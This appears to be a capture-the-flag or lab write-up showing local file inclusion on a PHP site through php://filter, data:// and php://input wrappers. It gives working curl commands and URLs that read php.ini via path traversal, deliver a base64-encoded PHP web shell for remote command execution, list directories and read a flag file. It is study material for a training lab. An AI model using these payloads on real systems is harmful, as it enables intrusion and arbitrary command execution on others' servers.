# PHP Wrappers
{% code overflow="wrap" %}
```
curl "http://94.237.49.182:39505/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" > php-ini.txt
```
{% endcode %}
ORRRR we could just visit the site
Just decode it in the terminal and as we can see here the allow\_url\_include is on which means that we can do some rce.
```
echo '' | base64
PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
```
As we can see here that we have rce in the server
* First pov here in curl
{% code overflow="wrap" %}
```
curl -s 'http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
```
{% endcode %}
* Second pov here in the browser
{% code overflow="wrap" %}
```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=i
```
{% endcode %}
After that we can just display the files in the current directory of web server
{% code overflow="wrap" %}
```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls
```
{% endcode %}
Then after that we can just view the flag in the / directory
{% code overflow="wrap" %}
```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cd /; ls
```
{% endcode %}
{% code overflow="wrap" %}
```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat /37809e2f8952f06139011994726d9ef1.txt
```
{% endcode %}
**For the second way to get the rce we will try the input wrapper**
{% code overflow="wrap" %}
```
curl -s -X POST --data '' "http://94.237.49.182:39505/index.php?language=php://input&cmd=ls"
```
{% endcode %}
**For the third way we will try the expect wrapper**
```
echo 'BASE64 OF php.ini' | base64 -d | grep expect
```
